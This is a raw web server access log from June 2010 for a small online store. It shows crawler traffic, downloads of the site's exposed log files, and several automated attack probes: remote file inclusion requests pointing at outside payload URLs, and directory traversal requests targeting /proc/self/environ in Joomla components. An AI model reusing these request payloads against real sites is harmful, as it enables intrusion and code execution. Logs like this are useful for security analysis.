178.63.49.141 - - [21/Jun/2010:01:36:30 -0400] "GET /images/ HTTP/1.1" 200 49338 "https://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:31 -0400] "GET /index.htm HTTP/1.1" 200 870 "http://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:31 -0400] "GET /scripts/ HTTP/1.1" 200 802 "http://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:31 -0400] "GET /Includes/ HTTP/1.1" 200 220 "http://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:31 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "http://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:31 -0400] "GET /images/ HTTP/1.1" 200 49338 "http://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:31 -0400] "GET /logs/ HTTP/1.1" 200 55286 "http://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:32 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "https://www.aceonlinestore.com/ACE.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:32 -0400] "GET /index.htm HTTP/1.1" 200 870 "https://www.aceonlinestore.com/index.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:32 -0400] "GET /Includes/ HTTP/1.1" 200 220 "https://www.aceonlinestore.com/Includes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:32 -0400] "GET /images/ HTTP/1.1" 200 49338 "https://www.aceonlinestore.com/images/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
87.106.28.150 - - [21/Jun/2010:01:36:32 -0400] "GET /logs/access_log.Q109122000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
87.106.28.150 - - [21/Jun/2010:01:36:33 -0400] "GET /logs/access_log.Q109053000%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://suzuka.fileave.com/zfxid1.txt? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
178.63.50.84 - - [21/Jun/2010:01:36:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.438)"
178.63.50.84 - - [21/Jun/2010:01:36:37 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4318)"
178.63.50.147 - - [21/Jun/2010:01:36:39 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.433)"
178.63.50.146 - - [21/Jun/2010:01:36:40 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4314)"
178.63.50.147 - - [21/Jun/2010:01:36:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4318)"
178.63.50.146 - - [21/Jun/2010:01:36:40 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4312)"
78.46.76.90 - - [21/Jun/2010:01:36:41 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
178.63.50.147 - - [21/Jun/2010:01:36:41 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4318)"
78.46.76.90 - - [21/Jun/2010:01:36:41 -0400] "GET /index.htm HTTP/1.1" 200 870 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.430)"
178.63.49.141 - - [21/Jun/2010:01:36:42 -0400] "GET /scripts/ HTTP/1.1" 200 802 "https://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:42 -0400] "GET /logs/ HTTP/1.1" 200 55286 "https://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.72.56 - - [21/Jun/2010:01:36:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.431)"
178.63.49.141 - - [21/Jun/2010:01:36:43 -0400] "GET /scripts/ HTTP/1.1" 200 802 "https://www.aceonlinestore.com/scripts/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:43 -0400] "GET /logs/ HTTP/1.1" 200 55286 "https://www.aceonlinestore.com/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.50.147 - - [21/Jun/2010:01:36:43 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4318)"
78.46.76.90 - - [21/Jun/2010:01:36:42 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN+WORDPR01+WEBFUNC+M37+FUNCPARMS+STD_DESC(A0300):60198_________________________ HTTP/1.1" 200 77252 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.430)"
78.46.72.56 - - [21/Jun/2010:01:36:43 -0400] "GET / HTTP/1.1" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4316)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "http://www.aceonlinestore.com/images/LCALEN.HTM" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /images/Office Supply/ HTTP/1.1" 404 211 "http://www.aceonlinestore.com/images/Office Supply/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "http://www.aceonlinestore.com/images/_notes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.71.217 - - [21/Jun/2010:01:36:44 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.431)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC(A0300): HTTP/1.1" 401 527 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC(A0300):" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC HTTP/1.1" 401 527 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?PROCFUN WORDPR01 WEBFUNC M37 FUNCPARMS STD_DESC" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY HTTP/1.1" 401 527 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "http://www.aceonlinestore.com/images/tools/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY HTTP/1.1" 401 527 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun wordpr01 webfunc M37 funcparms WEBKEY" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /logs/access_log.Q109050700 HTTP/1.1" 200 301885 "http://www.aceonlinestore.com/logs/access_log.Q109050700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
67.59.156.163 - - [21/Jun/2010:01:36:47 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:36:47 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:36:47 -0400] "GET /logs/access_log.Q110042800//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:36:47 -0400] "GET /logs/access_log.Q110042800//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:36:47 -0400] "GET /logs//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:36:47 -0400] "GET //include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
78.46.71.217 - - [21/Jun/2010:01:36:48 -0400] "GET /images/ HTTP/1.1" 200 49338 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4315)"
62.44.82.118 - - [21/Jun/2010:01:36:48 -0400] "GET /logs/access_log.Q110051400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
78.46.71.218 - - [21/Jun/2010:01:36:50 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4317)"
78.46.71.218 - - [21/Jun/2010:01:36:50 -0400] "GET /Includes/ HTTP/1.1" 200 220 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.431)"
178.63.49.141 - - [21/Jun/2010:01:36:44 -0400] "GET /images/items/ HTTP/1.1" 200 80009 "http://www.aceonlinestore.com/images/items/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:53 -0400] "GET /images/LCALEN.HTM HTTP/1.1" 200 7943 "http://www.aceonlinestore.com/images/LCALEN.HTM" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:53 -0400] "GET /images/tools/ HTTP/1.1" 200 3703 "http://www.aceonlinestore.com/images/tools/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:53 -0400] "GET /images/_notes/ HTTP/1.1" 200 15469 "http://www.aceonlinestore.com/images/_notes/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:53 -0400] "GET /images/items/ HTTP/1.1" 200 80009 "http://www.aceonlinestore.com/images/items/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:53 -0400] "GET /logs/access_log.Q109050700 HTTP/1.1" 200 301885 "http://www.aceonlinestore.com/logs/access_log.Q109050700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
78.46.76.90 - - [21/Jun/2010:01:36:59 -0400] "GET /logs/ HTTP/1.1" 200 55286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
62.44.82.118 - - [21/Jun/2010:01:37:02 -0400] "GET /logs/error_log.Q110051800//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
78.46.66.125 - - [21/Jun/2010:01:37:03 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.430)"
78.46.66.125 - - [21/Jun/2010:01:37:03 -0400] "GET /scripts/ HTTP/1.1" 200 802 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.439)"
82.76.12.197 - - [21/Jun/2010:01:37:05 -0400] "GET /logs/access_log.Q110051800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
78.46.76.90 - - [21/Jun/2010:01:37:05 -0400] "GET /logs/ HTTP/1.1" 200 55286 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
82.76.12.197 - - [21/Jun/2010:01:37:06 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:37:06 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
78.46.72.56 - - [21/Jun/2010:01:37:07 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.434)"
78.46.72.56 - - [21/Jun/2010:01:37:09 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.436)"
78.46.72.56 - - [21/Jun/2010:01:37:10 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
216.17.105.143 - - [21/Jun/2010:01:37:11 -0400] "GET /logs/access_log.Q110051800/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.830"
67.59.156.163 - - [21/Jun/2010:01:37:11 -0400] "GET /logs/access_log.Q110010700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
67.59.156.163 - - [21/Jun/2010:01:37:11 -0400] "GET /logs/access_log.Q110010700//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
216.17.105.143 - - [21/Jun/2010:01:37:12 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
62.44.82.118 - - [21/Jun/2010:01:37:12 -0400] "GET /logs/error_log.Q110051400//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
216.17.105.143 - - [21/Jun/2010:01:37:12 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.830"
78.46.72.56 - - [21/Jun/2010:01:37:12 -0400] "GET /ACE.html HTTP/1.1" 200 5877 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4310)"
82.76.12.197 - - [21/Jun/2010:01:37:15 -0400] "GET /logs/access_log.Q110060700/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
82.76.12.197 - - [21/Jun/2010:01:37:15 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
67.59.156.163 - - [21/Jun/2010:01:37:15 -0400] "GET /logs/error_log.Q109070600%20%20//include/admin.lib.inc.php?site_path=http://www.howtolisten.kr/lct/flashmenu/auto1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
82.76.12.197 - - [21/Jun/2010:01:37:16 -0400] "GET /logs/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 55286 "-" "libwww-perl/5.831"
220.181.7.95 - - [21/Jun/2010:01:37:34 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
82.76.12.197 - - [21/Jun/2010:01:37:43 -0400] "GET /logs/access_log.Q110061500/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109050900 HTTP/1.1" 200 3163151 "http://www.aceonlinestore.com/logs/access_log.Q109050900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051600 HTTP/1.1" 200 2853952 "http://www.aceonlinestore.com/logs/access_log.Q109051600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051400 HTTP/1.1" 200 6017281 "http://www.aceonlinestore.com/logs/access_log.Q109051400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051200 HTTP/1.1" 200 6040641 "http://www.aceonlinestore.com/logs/access_log.Q109051200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051700 HTTP/1.1" 200 2276726 "http://www.aceonlinestore.com/logs/access_log.Q109051700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051100 HTTP/1.1" 200 5205411 "http://www.aceonlinestore.com/logs/access_log.Q109051100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051300 HTTP/1.1" 200 5889638 "http://www.aceonlinestore.com/logs/access_log.Q109051300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051000 HTTP/1.1" 200 3272696 "http://www.aceonlinestore.com/logs/access_log.Q109051000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109050800 HTTP/1.1" 200 5406893 "http://www.aceonlinestore.com/logs/access_log.Q109050800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:36:56 -0400] "GET /logs/access_log.Q109051500 HTTP/1.1" 200 6117848 "http://www.aceonlinestore.com/logs/access_log.Q109051500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
82.76.12.197 - - [21/Jun/2010:01:38:26 -0400] "GET /logs/access_log.Q110053100/?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 225 "-" "libwww-perl/5.831"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052700 HTTP/1.1" 200 4217417 "http://www.aceonlinestore.com/logs/access_log.Q109052700" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052600 HTTP/1.1" 200 4651429 "http://www.aceonlinestore.com/logs/access_log.Q109052600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052500 HTTP/1.1" 200 2746180 "http://www.aceonlinestore.com/logs/access_log.Q109052500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109051800 HTTP/1.1" 200 5218469 "http://www.aceonlinestore.com/logs/access_log.Q109051800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109051900 HTTP/1.1" 200 5938231 "http://www.aceonlinestore.com/logs/access_log.Q109051900" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052300 HTTP/1.1" 200 2758218 "http://www.aceonlinestore.com/logs/access_log.Q109052300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052400 HTTP/1.1" 200 2479154 "http://www.aceonlinestore.com/logs/access_log.Q109052400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052200 HTTP/1.1" 200 4757864 "http://www.aceonlinestore.com/logs/access_log.Q109052200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052000 HTTP/1.1" 200 5825651 "http://www.aceonlinestore.com/logs/access_log.Q109052000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:37:56 -0400] "GET /logs/access_log.Q109052100 HTTP/1.1" 200 5038627 "http://www.aceonlinestore.com/logs/access_log.Q109052100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
82.76.12.197 - - [21/Jun/2010:01:39:07 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.831"
209.59.12.99 - - [21/Jun/2010:01:39:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
163.20.26.5 - - [21/Jun/2010:01:39:32 -0400] "GET //index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
62.44.82.118 - - [21/Jun/2010:01:39:34 -0400] "GET /logs/access_log.Q110052100//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 235 "-" "libwww-perl/5.803"
216.17.105.143 - - [21/Jun/2010:01:39:34 -0400] "GET /?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 409 "-" "libwww-perl/5.830"
203.211.149.167 - - [21/Jun/2010:01:39:41 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
203.211.149.167 - - [21/Jun/2010:01:39:41 -0400] "GET //index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 208 "-" "libwww-perl/5.831"
203.120.246.20 - - [21/Jun/2010:01:39:44 -0400] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 207 "-" "libwww-perl/5.808"
62.44.82.118 - - [21/Jun/2010:01:39:48 -0400] "GET /logs/error_log.Q110052100//index.php?option=com_sectionex&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 234 "-" "libwww-perl/5.803"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109053100 HTTP/1.1" 200 1986553 "http://www.aceonlinestore.com/logs/access_log.Q109053100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109060100 HTTP/1.1" 200 4231911 "http://www.aceonlinestore.com/logs/access_log.Q109060100" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109053000 HTTP/1.1" 200 2289625 "http://www.aceonlinestore.com/logs/access_log.Q109053000" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109060500 HTTP/1.1" 200 3718537 "http://www.aceonlinestore.com/logs/access_log.Q109060500" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109052800 HTTP/1.1" 200 4403369 "http://www.aceonlinestore.com/logs/access_log.Q109052800" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109060600 HTTP/1.1" 200 2519002 "http://www.aceonlinestore.com/logs/access_log.Q109060600" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109060200 HTTP/1.1" 200 4890211 "http://www.aceonlinestore.com/logs/access_log.Q109060200" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109060300 HTTP/1.1" 200 3991095 "http://www.aceonlinestore.com/logs/access_log.Q109060300" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
178.63.49.141 - - [21/Jun/2010:01:38:57 -0400] "GET /logs/access_log.Q109060400 HTTP/1.1" 200 4467320 "http://www.aceonlinestore.com/logs/access_log.Q109060400" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4313)"
